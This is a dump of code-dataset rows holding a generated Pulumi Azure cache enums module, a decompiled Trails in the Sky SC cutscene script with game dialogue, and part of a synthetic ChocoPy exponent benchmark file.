f.writelines(extractor.extract_double_concerned_statements())
| [
"[email protected]"
] | |
49440e2525655c4cccc5adb43fc2eaae167e8f7e | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/cache/_enums.py | 687882b04641acfe4856e26c5ddfb16742be973e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 3,490 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'AofFrequency',
'ClusteringPolicy',
'DayOfWeek',
'EvictionPolicy',
'PrivateEndpointServiceConnectionStatus',
'Protocol',
'PublicNetworkAccess',
'RdbFrequency',
'ReplicationRole',
'SkuFamily',
'SkuName',
'TlsVersion',
]
class AofFrequency(str, Enum):
"""
Sets the frequency at which data is written to disk.
"""
AOF_FREQUENCY_1S = "1s"
ALWAYS = "always"
class ClusteringPolicy(str, Enum):
"""
Clustering policy - default is OSSCluster. Specified at create time.
"""
ENTERPRISE_CLUSTER = "EnterpriseCluster"
OSS_CLUSTER = "OSSCluster"
class DayOfWeek(str, Enum):
"""
Day of the week when a cache can be patched.
"""
MONDAY = "Monday"
TUESDAY = "Tuesday"
WEDNESDAY = "Wednesday"
THURSDAY = "Thursday"
FRIDAY = "Friday"
SATURDAY = "Saturday"
SUNDAY = "Sunday"
EVERYDAY = "Everyday"
WEEKEND = "Weekend"
class EvictionPolicy(str, Enum):
"""
Redis eviction policy - default is VolatileLRU
"""
ALL_KEYS_LFU = "AllKeysLFU"
ALL_KEYS_LRU = "AllKeysLRU"
ALL_KEYS_RANDOM = "AllKeysRandom"
VOLATILE_LRU = "VolatileLRU"
VOLATILE_LFU = "VolatileLFU"
VOLATILE_TTL = "VolatileTTL"
VOLATILE_RANDOM = "VolatileRandom"
NO_EVICTION = "NoEviction"
class PrivateEndpointServiceConnectionStatus(str, Enum):
"""
Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class Protocol(str, Enum):
"""
Specifies whether redis clients can connect using TLS-encrypted or plaintext redis protocols. Default is TLS-encrypted.
"""
ENCRYPTED = "Encrypted"
PLAINTEXT = "Plaintext"
class PublicNetworkAccess(str, Enum):
"""
Whether or not public endpoint access is allowed for this cache. Value is optional but if passed in, must be 'Enabled' or 'Disabled'. If 'Disabled', private endpoints are the exclusive access method. Default value is 'Enabled'
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class RdbFrequency(str, Enum):
"""
Sets the frequency at which a snapshot of the database is created.
"""
RDB_FREQUENCY_1H = "1h"
RDB_FREQUENCY_6H = "6h"
RDB_FREQUENCY_12H = "12h"
class ReplicationRole(str, Enum):
"""
Role of the linked server.
"""
PRIMARY = "Primary"
SECONDARY = "Secondary"
class SkuFamily(str, Enum):
"""
The SKU family to use. Valid values: (C, P). (C = Basic/Standard, P = Premium).
"""
C = "C"
P = "P"
class SkuName(str, Enum):
"""
The type of RedisEnterprise cluster to deploy. Possible values: (Enterprise_E10, EnterpriseFlash_F300 etc.)
"""
ENTERPRISE_E10 = "Enterprise_E10"
ENTERPRISE_E20 = "Enterprise_E20"
ENTERPRISE_E50 = "Enterprise_E50"
ENTERPRISE_E100 = "Enterprise_E100"
ENTERPRISE_FLASH_F300 = "EnterpriseFlash_F300"
ENTERPRISE_FLASH_F700 = "EnterpriseFlash_F700"
ENTERPRISE_FLASH_F1500 = "EnterpriseFlash_F1500"
class TlsVersion(str, Enum):
"""
The minimum TLS version for the cluster to support, e.g. '1.2'
"""
TLS_VERSION_1_0 = "1.0"
TLS_VERSION_1_1 = "1.1"
TLS_VERSION_1_2 = "1.2"
| [
"[email protected]"
] | |
c9f5c22556be98cbe18c1f2803000713bd307741 | 80301f1cffc5afce13256e2ecab6323c5df00194 | /cn.sc/py/C1707.py | aae24a1028182e2d6b73336421142d36b5e71075 | [] | no_license | ZhenjianYang/SoraVoiceScripts | c1ddf7c1bbcb933243754f9669bd6b75777c87b9 | 94a948090aba0f63b10b2c69dc845dc99c822fc4 | refs/heads/master | 2023-04-18T04:54:44.306652 | 2023-04-06T11:15:17 | 2023-04-06T11:15:17 | 103,167,541 | 43 | 11 | null | 2021-03-06T08:52:54 | 2017-09-11T17:36:55 | Python | UTF-8 | Python | false | false | 20,443 | py | from ED6SCScenarioHelper import *
def main():
SetCodePage("gbk")
    # Bose
CreateScenaFile(
FileName = 'C1707 ._SN',
MapName = 'Bose',
Location = 'C1707.x',
MapIndex = 1,
MapDefaultBGM = "ed60010",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'歼灭天使玲', # 9
'福音', # 10
'帕蒂尔·玛蒂尔', # 11
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 0,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT27/CH04510 ._CH', # 00
'ED6_DT06/CH20020 ._CH', # 01
'ED6_DT27/CH04000 ._CH', # 02
'ED6_DT27/CH04010 ._CH', # 03
)
AddCharChipPat(
'ED6_DT27/CH04510P._CP', # 00
'ED6_DT06/CH20020P._CP', # 01
'ED6_DT27/CH04000P._CP', # 02
'ED6_DT27/CH04010P._CP', # 03
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 458753,
ChipIndex = 0x1,
NpcIndex = 0x1E6,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
ScpFunction(
"Function_0_12A", # 00, 0
"Function_1_142", # 01, 1
"Function_2_160", # 02, 2
"Function_3_1029", # 03, 3
"Function_4_10B0", # 04, 4
)
def Function_0_12A(): pass
label("Function_0_12A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x21E, 0)), scpexpr(EXPR_END)), "loc_141")
OP_A3(0x10F0)
OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x53), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Event(0, 2)
label("loc_141")
Return()
# Function_0_12A end
def Function_1_142(): pass
label("Function_1_142")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x400, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_156")
OP_B1("C1707_y")
Jump("loc_15F")
label("loc_156")
OP_B1("C1707_n")
label("loc_15F")
Return()
# Function_1_142 end
def Function_2_160(): pass
label("Function_2_160")
EventBegin(0x0)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x240, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x240, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_177")
Call(0, 3)
Call(0, 4)
label("loc_177")
OP_82(0x80, 0x0)
OP_82(0x82, 0x0)
OP_72(0x9, 0x4)
OP_72(0x8, 0x4)
OP_71(0x7, 0x4)
OP_71(0x2, 0x4)
OP_71(0x3, 0x4)
OP_71(0x4, 0x4)
OP_71(0x5, 0x4)
OP_71(0x6, 0x4)
OP_79(0x0, 0x2)
OP_79(0x1, 0x2)
OP_79(0x2, 0x2)
OP_79(0x3, 0x2)
OP_79(0x4, 0x2)
OP_7B()
LoadEffect(0x1, "map\\\\mp021_00.eff")
LoadEffect(0x2, "map\\\\mp064_01.eff")
LoadEffect(0x3, "map\\\\mp065_01.eff")
LoadEffect(0x4, "map\\\\mp064_00.eff")
LoadEffect(0x5, "map\\\\mp065_00.eff")
OP_72(0x0, 0x4)
OP_A1(0xA, 0x0)
SetChrPos(0xA, 10580, 500, 9330, 225)
OP_71(0x0, 0x20)
OP_B0(0x0, 0x14)
OP_6F(0x0, 381)
OP_70(0x0, 0x1A4)
ClearChrFlags(0xA, 0x80)
SetChrFlags(0xA, 0x1)
OP_51(0xA, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_OR), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0xA, 0x7, (scpexpr(EXPR_PUSH_LONG, 0x1770), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0xA, 0x34, (scpexpr(EXPR_PUSH_LONG, 0xEA60), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
ClearMapFlags(0x40)
SetChrPos(0x101, 1200, 0, 1200, 45)
SetChrPos(0x102, 870, 0, 2560, 45)
SetChrPos(0xF8, -50, 0, 110, 45)
SetChrPos(0xF9, -450, 0, 1740, 45)
SetChrSubChip(0x101, 0)
SetChrChipByIndex(0x101, 65535)
SetChrSubChip(0x102, 0)
SetChrChipByIndex(0x102, 65535)
SetChrSubChip(0xF8, 0)
SetChrChipByIndex(0xF8, 65535)
SetChrSubChip(0xF9, 0)
SetChrChipByIndex(0xF9, 65535)
SetChrPos(0x8, 1220, 950, 12420, 0)
ClearChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x10)
SetChrChipByIndex(0x8, 0)
SetChrSubChip(0x8, 0)
ClearChrFlags(0x8, 0x1)
OP_CF(0x8, 0x0, "Frame85__ren")
OP_51(0x8, 0x24, (scpexpr(EXPR_PUSH_LONG, 0xA5), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_6D(34920, 250, 12030, 0)
OP_67(0, 9500, -10000, 0)
OP_6B(3960, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
OP_22(0x1C3, 0x0, 0x64)
def lambda_386():
OP_6D(6260, 250, 8340, 5000)
ExitThread()
QueueWorkItem(0x101, 0, lambda_386)
def lambda_39E():
OP_67(0, 5950, -10000, 5000)
ExitThread()
QueueWorkItem(0x101, 1, lambda_39E)
def lambda_3B6():
OP_6B(4940, 5000)
ExitThread()
QueueWorkItem(0x101, 2, lambda_3B6)
FadeToBright(1000, 0)
OP_0D()
Sleep(1000)
WaitChrThread(0x101, 0x0)
Fade(500)
OP_71(0x8, 0x4)
OP_6D(7230, 250, 9770, 0)
OP_67(0, 3510, -10000, 0)
OP_6B(5260, 0)
OP_6C(32000, 0)
OP_6E(243, 0)
OP_0D()
Sleep(500)
ChrTalk( #0
0x101,
"#1026F#5P恢、恢复了……\x02",
)
CloseMessageWindow()
ChrTalk( #1
0x102,
"#1042F#5P『塔』已经解放了吗……\x02",
)
CloseMessageWindow()
ChrTalk( #2
0x8,
(
"#1302F#6P……真无趣。\x02\x03",
"时间再多一点的话,\x01",
"就能把你们全部杀光了。\x02",
)
)
CloseMessageWindow()
Sleep(500)
OP_22(0x113, 0x1, 0x46)
OP_22(0x114, 0x0, 0x64)
PlayEffect(0x1, 0x0, 0xA, 0, -500, 0, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
OP_22(0xCC, 0x0, 0x64)
PlayEffect(0x4, 0x1, 0xA, 4950, 2800, 0, 0, 0, 20, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x2, 0xA, -4950, 2800, 0, 0, 0, 340, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
Sleep(500)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(100)
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF8)"), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_5BB")
OP_62(0xF8, 0x0, 2300, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_5F9")
label("loc_5BB")
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF8)"), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_5E2")
OP_62(0xF8, 0x0, 1700, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_5F9")
label("loc_5E2")
OP_62(0xF8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
label("loc_5F9")
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF9)"), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_620")
OP_62(0xF9, 0x0, 2300, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_65E")
label("loc_620")
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF9)"), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_647")
OP_62(0xF9, 0x0, 1700, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_65E")
label("loc_647")
OP_62(0xF9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
label("loc_65E")
Sleep(1000)
def lambda_669():
OP_8C(0xFE, 45, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_669)
def lambda_677():
OP_8C(0xFE, 45, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_677)
Sleep(100)
def lambda_68A():
OP_8C(0xFE, 45, 400)
ExitThread()
QueueWorkItem(0xF8, 1, lambda_68A)
OP_8C(0xF9, 45, 400)
ChrTalk( #3
0x101,
"#1005F#5P慢、慢着!?\x02",
)
CloseMessageWindow()
ChrTalk( #4
0x8,
(
"#1306F#6P哈哈哈……\x01",
"玲要回『古罗力亚斯』了。\x02\x03",
"教授说过,『β』一旦完成\x01",
"就让玲回去的。\x02",
)
)
CloseMessageWindow()
ChrTalk( #5
0x101,
"#1020F#5P教、教授!?\x02",
)
CloseMessageWindow()
ChrTalk( #6
0x102,
(
"#1044F#5P『β』已经完成了……\x02\x03",
"#1046F恢复『塔』的原样\x01",
"也是计划的一部分吗!?\x02",
)
)
CloseMessageWindow()
ChrTalk( #7
0x8,
(
"#263F#6P谁知道?\x01",
"玲也不怎么清楚。\x02\x03",
"#1305F不过,听说笼罩这里的结界\x01",
"是『环』的“手”。\x02",
)
)
CloseMessageWindow()
ChrTalk( #8
0x101,
"#1026F#5P『辉之环』的……手!?\x02",
)
CloseMessageWindow()
ChrTalk( #9
0x8,
(
"#261F#6P嘻嘻……\x01",
"会是什么意思呢?\x02",
)
)
CloseMessageWindow()
OP_4F(0x1C, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
ClearMapFlags(0x10)
def lambda_836():
OP_6D(11800, 4800, 10810, 3000)
ExitThread()
QueueWorkItem(0x101, 1, lambda_836)
def lambda_84E():
OP_67(0, 3560, -10000, 3000)
ExitThread()
QueueWorkItem(0x101, 2, lambda_84E)
def lambda_866():
OP_6B(3450, 3000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_866)
def lambda_876():
OP_6C(41000, 3000)
ExitThread()
QueueWorkItem(0x102, 2, lambda_876)
def lambda_886():
OP_6E(325, 3000)
ExitThread()
QueueWorkItem(0x102, 3, lambda_886)
PlayEffect(0x2, 0x1, 0xA, 5000, 2500, 0, 0, 0, 20, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x2, 0x2, 0xA, -4900, 2500, 0, 0, 0, 340, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
def lambda_900():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x1F4, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_900)
Sleep(300)
def lambda_920():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x2EE, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_920)
Sleep(300)
def lambda_940():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_940)
OP_24(0x113, 0x50)
Sleep(100)
OP_72(0x0, 0x20)
OP_D8(0x0, 0x1F4)
OP_6F(0x0, 241)
OP_70(0x0, 0x104)
OP_82(0x0, 0x2)
Sleep(50)
PlayEffect(0x2, 0x1, 0xA, 4600, 2600, 0, 0, 0, 18, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x2, 0x2, 0xA, -4600, 2600, 0, 0, 0, 342, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
Sleep(250)
def lambda_9F2():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x2EE, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_9F2)
OP_24(0x113, 0x5A)
Sleep(100)
OP_24(0x113, 0x64)
WaitChrThread(0xA, 0x1)
WaitChrThread(0x101, 0x1)
SetChrSubChip(0x8, 0)
WaitChrThread(0x101, 0x1)
Sleep(500)
ChrTalk( #10
0x8,
(
"#263F#5P哈哈哈,那么再见了。\x02\x03",
"#1304F下次见面时──\x01",
"我会把你们全部杀掉。\x02",
)
)
CloseMessageWindow()
def lambda_A80():
OP_8C(0xFE, 80, 10)
ExitThread()
QueueWorkItem(0xA, 2, lambda_A80)
Sleep(200)
def lambda_A93():
OP_8C(0xFE, 80, 15)
ExitThread()
QueueWorkItem(0xA, 2, lambda_A93)
Sleep(200)
def lambda_AA6():
OP_8C(0xFE, 80, 20)
ExitThread()
QueueWorkItem(0xA, 2, lambda_AA6)
Sleep(500)
def lambda_AB9():
OP_8C(0xFE, 80, 30)
ExitThread()
QueueWorkItem(0xA, 2, lambda_AB9)
Sleep(100)
def lambda_ACC():
OP_8C(0xFE, 80, 40)
ExitThread()
QueueWorkItem(0xA, 2, lambda_ACC)
Sleep(2500)
Fade(500)
OP_6D(16090, 5040, 13150, 0)
OP_67(0, 3440, -10000, 0)
OP_6B(3690, 0)
OP_6C(39000, 0)
OP_6E(325, 0)
ClearChrFlags(0xA, 0x1)
def lambda_B26():
OP_8C(0xFE, 80, 20)
ExitThread()
QueueWorkItem(0xA, 2, lambda_B26)
Sleep(500)
def lambda_B39():
OP_8C(0xFE, 80, 15)
ExitThread()
QueueWorkItem(0xA, 2, lambda_B39)
Sleep(500)
def lambda_B4C():
OP_8C(0xFE, 80, 10)
ExitThread()
QueueWorkItem(0xA, 2, lambda_B4C)
WaitChrThread(0xA, 0x2)
def lambda_B5F():
OP_6B(3900, 4000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_B5F)
OP_72(0x0, 0x20)
OP_D8(0x0, 0x1F4)
OP_6F(0x0, 261)
OP_70(0x0, 0x118)
OP_22(0x116, 0x0, 0x64)
OP_73(0x0)
Sleep(500)
PlayEffect(0x3, 0x0, 0xA, 500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x3, 0xA, -500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x4, 0xA, 1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x5, 0xA, 400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x6, 0xA, -1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x7, 0xA, -400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
OP_22(0x114, 0x0, 0x64)
Sleep(2000)
PlayEffect(0x2, 0x0, 0xA, 500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x2, 0x3, 0xA, -500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x4, 0xA, 1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x5, 0xA, 400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x6, 0xA, -1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x7, 0xA, -400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
OP_71(0x0, 0x20)
OP_6F(0x0, 281)
OP_70(0x0, 0x12C)
OP_82(0x1, 0x2)
OP_82(0x2, 0x2)
Sleep(500)
def lambda_E37():
OP_6D(16040, 8000, 13170, 3000)
ExitThread()
QueueWorkItem(0x101, 0, lambda_E37)
def lambda_E4F():
OP_67(0, 690, -10000, 3000)
ExitThread()
QueueWorkItem(0x101, 1, lambda_E4F)
def lambda_E67():
OP_6C(75000, 3000)
ExitThread()
QueueWorkItem(0x101, 2, lambda_E67)
def lambda_E77():
OP_6E(548, 3000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_E77)
def lambda_E87():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_E87)
Sleep(100)
def lambda_EA7():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0xFA0, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_EA7)
Sleep(100)
def lambda_EC7():
OP_8F(0xFE, 0x16F2D8, 0x61A8, 0x5064, 0x1F40, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_EC7)
Sleep(100)
def lambda_EE7():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0x2710, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_EE7)
Sleep(100)
def lambda_F07():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0x32C8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F07)
Sleep(100)
def lambda_F27():
OP_8F(0xFE, 0x25968, 0x7530, 0x5064, 0x4650, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F27)
Sleep(100)
def lambda_F47():
OP_8F(0xFE, 0x25968, 0x7530, 0x5064, 0x59D8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F47)
Sleep(100)
def lambda_F67():
OP_8F(0xFE, 0x25968, 0x7530, 0x5064, 0x6D60, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F67)
Sleep(100)
def lambda_F87():
OP_8F(0xFE, 0x25968, 0x9C40, 0x5064, 0x80E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F87)
Sleep(100)
def lambda_FA7():
OP_8F(0xFE, 0x25968, 0x9C40, 0x5064, 0x9470, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_FA7)
Sleep(100)
def lambda_FC7():
OP_8F(0xFE, 0x25968, 0xC350, 0x5064, 0xA7F8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_FC7)
Sleep(100)
def lambda_FE7():
OP_8F(0xFE, 0x25968, 0xC350, 0x5064, 0xBB80, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_FE7)
WaitChrThread(0xA, 0x1)
WaitChrThread(0x101, 0x1)
FadeToDark(1000, 0, -1)
OP_0D()
OP_A2(0x1E24)
SetMapFlags(0x100000)
OP_A2(0x10FF)
OP_A2(0x10F5)
NewScene("ED6_DT21/E0810 ._SN", 100, 0, 0)
IdleLoop()
Return()
# Function_2_160 end
def Function_3_1029(): pass
label("Function_3_1029")
FadeToDark(0, 0, -1)
OP_A3(0x1200)
OP_A3(0x1201)
RemoveParty(0x2, 0xFF)
RemoveParty(0x5, 0xFF)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Menu(
0,
10,
100,
0,
(
"【◇选择雪拉扎德为队友】\x01", # 0
"【◇选择阿加特为队友】\x01", # 1
)
)
MenuEnd(0x0)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_5F(0x0)
OP_56(0x0)
Switch(
(scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)),
(0, "loc_10A3"),
(1, "loc_10A9"),
(SWITCH_DEFAULT, "loc_10AF"),
)
label("loc_10A3")
OP_A2(0x1200)
Jump("loc_10AF")
label("loc_10A9")
OP_A2(0x1201)
Jump("loc_10AF")
label("loc_10AF")
Return()
# Function_3_1029 end
def Function_4_10B0(): pass
label("Function_4_10B0")
FadeToDark(0, 0, -1)
OP_6D(-66940, 250, 36210, 0)
OP_67(0, 6500, -10000, 0)
OP_6B(3700, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
Sleep(200)
FadeToBright(0, 0)
OP_0D()
OP_C9(0x0, 0x4, 0x0, 0x1, 0xFF, 0xFF, 0x5, 0x2, 0x6, 0x4, 0x7, 0x8, 0xFFFF)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
FadeToDark(0, 0, -1)
OP_69(0x0, 0x0)
Return()
# Function_4_10B0 end
SaveToFile()
Try(main)
| [
"[email protected]"
] | |
084d1e9466ab51b588f6b9e5ee5775e6b2032af3 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/exp-big-987.py | 98a30d699cfa98b31b62bcdabb1a8d73c564b701 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,178 | py | # Compute x**y
def exp(x: int, y: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp2(x: int, y: int, x2: int, y2: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp3(x: int, y: int, x2: int, y2: int, x3: int, y3: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp4(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
            return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
